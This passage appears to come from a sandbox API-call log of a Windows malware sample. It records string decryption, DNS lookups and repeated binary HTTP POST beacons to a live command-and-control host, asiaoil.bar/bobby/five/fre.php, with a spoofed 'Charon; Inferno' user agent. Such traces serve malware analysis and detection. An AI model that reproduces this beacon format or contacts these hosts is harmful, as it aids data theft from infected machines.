159\r\nConnection: close\r\n\r\n") returned 243 [0317.346] GetProcessHeap () returned 0x740000 [0317.346] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0317.346] GetProcessHeap () returned 0x740000 [0317.347] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0317.347] send (s=0x32c, buf=0x747928*, len=243, flags=0) returned 243 [0317.347] send (s=0x32c, buf=0x761fd0*, len=159, flags=0) returned 159 [0317.347] GetProcessHeap () returned 0x740000 [0317.348] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0317.348] recv (in: s=0x32c, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 573 [0317.435] GetProcessHeap () returned 0x740000 [0317.436] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0317.436] GetProcessHeap () returned 0x740000 [0317.436] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d70 | out: hHeap=0x740000) returned 1 [0317.436] GetProcessHeap () returned 0x740000 [0317.437] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0317.437] GetProcessHeap () returned 0x740000 [0317.437] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d8f8 | out: hHeap=0x740000) returned 1 [0317.437] closesocket (s=0x32c) returned 0 [0317.438] GetProcessHeap () returned 0x740000 [0317.438] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b670 | out: hHeap=0x740000) returned 1 [0317.438] GetProcessHeap () returned 0x740000 [0317.438] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x766588 | out: hHeap=0x740000) returned 1 [0317.439] GetProcessHeap () returned 0x740000 [0317.439] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7636f8 | out: hHeap=0x740000) returned 1 [0317.439] GetProcessHeap () returned 0x740000 [0317.439] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bdf0 | out: hHeap=0x740000) returned 1 [0317.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x7c0) returned 0x32c [0317.442] Sleep (dwMilliseconds=0xea60) [0317.443] GetProcessHeap () returned 0x740000 [0317.443] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763938 [0317.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.445] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.453] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75d298) returned 1 [0317.463] GetProcessHeap () returned 0x740000 [0317.463] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758478 [0317.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.464] CryptImportKey (in: hProv=0x75d298, pbData=0x758478, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0317.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.466] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.467] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.467] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.467] GetProcessHeap () returned 0x740000 [0317.468] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758478 | out: hHeap=0x740000) returned 1 [0317.469] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.469] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763938, pdwDataLen=0x19fcfc | out: pbData=0x763938, pdwDataLen=0x19fcfc) returned 1 [0317.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.470] CryptDestroyKey (hKey=0x74d768) returned 1 [0317.471] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.580] CryptReleaseContext (hProv=0x75d298, dwFlags=0x0) returned 1 [0317.581] GetProcessHeap () returned 0x740000 [0317.581] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0317.581] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.582] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.582] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.583] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.584] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.584] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.585] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.585] GetProcessHeap () returned 0x740000 [0317.585] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75be40 [0317.585] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.586] GetProcessHeap () returned 0x740000 [0317.586] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75be40 | out: hHeap=0x740000) returned 1 [0317.586] GetProcessHeap () returned 0x740000 [0317.587] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0317.587] GetProcessHeap () returned 0x740000 [0317.587] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763938 | out: hHeap=0x740000) returned 1 [0317.587] GetProcessHeap () returned 0x740000 [0317.587] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x7638a8 [0317.588] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.588] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.596] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cf68) returned 1 [0317.603] GetProcessHeap () returned 0x740000 [0317.603] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758688 [0317.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.606] CryptImportKey (in: hProv=0x75cf68, pbData=0x758688, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d768) returned 1 [0317.607] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.607] CryptSetKeyParam (hKey=0x74d768, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.608] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.608] CryptSetKeyParam (hKey=0x74d768, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.608] GetProcessHeap () returned 0x740000 [0317.609] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758688 | out: hHeap=0x740000) returned 1 [0317.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.609] CryptDecrypt (in: hKey=0x74d768, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7638a8, pdwDataLen=0x19fcfc | out: pbData=0x7638a8, pdwDataLen=0x19fcfc) returned 1 [0317.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.610] CryptDestroyKey (hKey=0x74d768) returned 1 [0317.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.611] CryptReleaseContext (hProv=0x75cf68, dwFlags=0x0) returned 1 [0317.611] GetProcessHeap () returned 0x740000 [0317.611] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0317.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.612] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0317.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.613] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0317.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.614] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0317.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.614] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0317.614] GetProcessHeap () returned 0x740000 [0317.614] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75c110 [0317.614] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0317.617] GetProcessHeap () returned 0x740000 [0317.617] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b530 [0317.617] socket (af=2, type=1, protocol=6) returned 0x330 [0317.617] connect (s=0x330, name=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0317.640] FreeAddrInfoW (pAddrInfo=0x75c070*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c490*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be40*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c238*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0317.640] GetProcessHeap () returned 0x740000 [0317.640] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75d210 [0317.640] GetProcessHeap () returned 0x740000 [0317.640] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0317.641] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0317.642] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0317.642] GetProcessHeap () returned 0x740000 [0317.643] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0317.643] GetProcessHeap () returned 0x740000 [0317.643] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0317.643] GetProcessHeap () returned 0x740000 [0317.643] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763d28 [0317.643] GetProcessHeap () returned 0x740000 [0317.643] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0317.645] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0317.646] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0317.646] GetProcessHeap () returned 0x740000 [0317.646] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0317.646] GetProcessHeap () returned 0x740000 [0317.646] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0317.647] send (s=0x330, buf=0x747928*, len=243, flags=0) returned 243 [0317.647] send (s=0x330, buf=0x761fd0*, len=159, flags=0) returned 159 [0317.648] GetProcessHeap () returned 0x740000 [0317.648] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xfd0) returned 0x755058 [0317.648] recv (in: s=0x330, buf=0x755058, len=4048, flags=0 | out: buf=0x755058*) returned 565 [0317.773] GetProcessHeap () returned 0x740000 [0317.773] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747928 | out: hHeap=0x740000) returned 1 [0317.775] GetProcessHeap () returned 0x740000 [0317.775] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763d28 | out: hHeap=0x740000) returned 1 [0317.775] GetProcessHeap () returned 0x740000 [0317.775] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x747868 | out: hHeap=0x740000) returned 1 [0317.775] GetProcessHeap () returned 0x740000 [0317.775] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75d210 | out: hHeap=0x740000) returned 1 [0317.775] closesocket (s=0x330) returned 0 [0317.777] GetProcessHeap () returned 0x740000 [0317.777] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75b530 | out: hHeap=0x740000) returned 1 [0317.777] GetProcessHeap () returned 0x740000 [0317.777] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767278 | out: hHeap=0x740000) returned 1 [0317.777] GetProcessHeap () returned 0x740000 [0317.778] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7638a8 | out: hHeap=0x740000) returned 1 [0317.778] GetProcessHeap () returned 0x740000 [0317.778] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75c110 | out: hHeap=0x740000) returned 1 [0317.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x755058, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x790) returned 0x330 [0317.780] Sleep (dwMilliseconds=0xea60) [0317.782] GetProcessHeap () returned 0x740000 [0317.782] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763c98 [0317.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.784] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.793] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.795] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75cc38) returned 1 [0317.804] GetProcessHeap () returned 0x740000 [0317.804] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x7584a8 [0317.805] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.806] CryptImportKey (in: hProv=0x75cc38, pbData=0x7584a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0317.806] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.834] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.835] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.836] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.836] GetProcessHeap () returned 0x740000 [0317.836] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x7584a8 | out: hHeap=0x740000) returned 1 [0317.837] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.837] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763c98, pdwDataLen=0x19fcfc | out: pbData=0x763c98, pdwDataLen=0x19fcfc) returned 1 [0317.838] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.839] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0317.840] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.840] CryptReleaseContext (hProv=0x75cc38, dwFlags=0x0) returned 1 [0317.840] GetProcessHeap () returned 0x740000 [0317.840] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x765ce8 [0317.841] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.841] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0317.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.843] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0317.843] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.844] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0317.845] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.846] StrStrA (lpFirst="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0317.846] GetProcessHeap () returned 0x740000 [0317.846] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bf80 [0317.846] getaddrinfo (in: pNodeName="\x9e\x8c\x96\x9e\x90\x96\x93Ñ\x9d\x9e\x8dÐÐ\x9d\x90\x9d\x9d\x86Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0317.846] GetProcessHeap () returned 0x740000 [0317.847] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x75bf80 | out: hHeap=0x740000) returned 1 [0317.847] GetProcessHeap () returned 0x740000 [0317.847] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x765ce8 | out: hHeap=0x740000) returned 1 [0317.847] GetProcessHeap () returned 0x740000 [0317.847] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x763c98 | out: hHeap=0x740000) returned 1 [0317.847] GetProcessHeap () returned 0x740000 [0317.848] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x40) returned 0x763668 [0317.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.849] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0317.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.857] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x75caa0) returned 1 [0317.866] GetProcessHeap () returned 0x740000 [0317.866] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x24) returned 0x758778 [0317.867] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.867] CryptImportKey (in: hProv=0x75caa0, pbData=0x758778, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x74d9e8) returned 1 [0317.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.869] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0317.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.870] CryptSetKeyParam (hKey=0x74d9e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0317.870] GetProcessHeap () returned 0x740000 [0317.870] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x758778 | out: hHeap=0x740000) returned 1 [0317.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.872] CryptDecrypt (in: hKey=0x74d9e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x763668, pdwDataLen=0x19fcfc | out: pbData=0x763668, pdwDataLen=0x19fcfc) returned 1 [0317.873] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.874] CryptDestroyKey (hKey=0x74d9e8) returned 1 [0317.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77b10000 [0317.875] CryptReleaseContext (hProv=0x75caa0, dwFlags=0x0) returned 1 [0317.875] GetProcessHeap () returned 0x740000 [0317.875] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x212) returned 0x767278 [0317.876] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.876] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="http://") returned 0x0 [0317.877] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.877] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="https://") returned 0x0 [0317.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.879] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch="/") returned="//bobby/five/fre.php" [0317.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77590000 [0317.880] StrStrA (lpFirst="asiaoil.bar//bobby/five/fre.php", lpSrch=":") returned 0x0 [0317.880] GetProcessHeap () returned 0x740000 [0317.880] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x20) returned 0x75bdc8 [0317.880] getaddrinfo (in: pNodeName="asiaoil.bar", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) returned 0 [0317.933] GetProcessHeap () returned 0x740000 [0317.933] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x4) returned 0x75b640 [0317.933] socket (af=2, type=1, protocol=6) returned 0x334 [0317.933] connect (s=0x334, name=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), namelen=16) returned 0 [0317.955] FreeAddrInfoW (pAddrInfo=0x75c110*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c1f0*(sa_family=2, sin_port=0x50, sin_addr="104.21.49.244"), ai_next=0x75be18*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x75c2c8*(sa_family=2, sin_port=0x50, sin_addr="172.67.197.66"), ai_next=0x0))) [0317.956] GetProcessHeap () returned 0x740000 [0317.956] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x7d) returned 0x75cdd0 [0317.956] GetProcessHeap () returned 0x740000 [0317.956] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x201b) returned 0x767650 [0317.956] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0317.958] wvsprintfA (in: param_1=0x767650, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 178 [0317.958] GetProcessHeap () returned 0x740000 [0317.958] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xb4) returned 0x747868 [0317.958] GetProcessHeap () returned 0x740000 [0317.958] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0317.958] GetProcessHeap () returned 0x740000 [0317.958] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x3e) returned 0x763e00 [0317.958] GetProcessHeap () returned 0x740000 [0317.959] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0x1fdc) returned 0x767650 [0317.959] LoadLibraryW (lpLibFileName="user32") returned 0x750d0000 [0317.960] wvsprintfA (in: param_1=0x767650, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST //bobby/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: asiaoil.bar\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 579BFA72\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 243 [0317.960] GetProcessHeap () returned 0x740000 [0317.960] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, Size=0xf5) returned 0x747928 [0317.960] GetProcessHeap () returned 0x740000 [0317.961] HeapFree (in: hHeap=0x740000, dwFlags=0x0, lpMem=0x767650 | out: hHeap=0x740000) returned 1 [0317.961] send (s=0x334, buf=0x747928*, len=243, flags=0) returned 243 [0317.962] send (s=0x334, buf=0x761fd0*, len=159, flags=0) returned 159 [0317.962] GetProcessHeap () returned 0x740000 [0317.962] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x0, 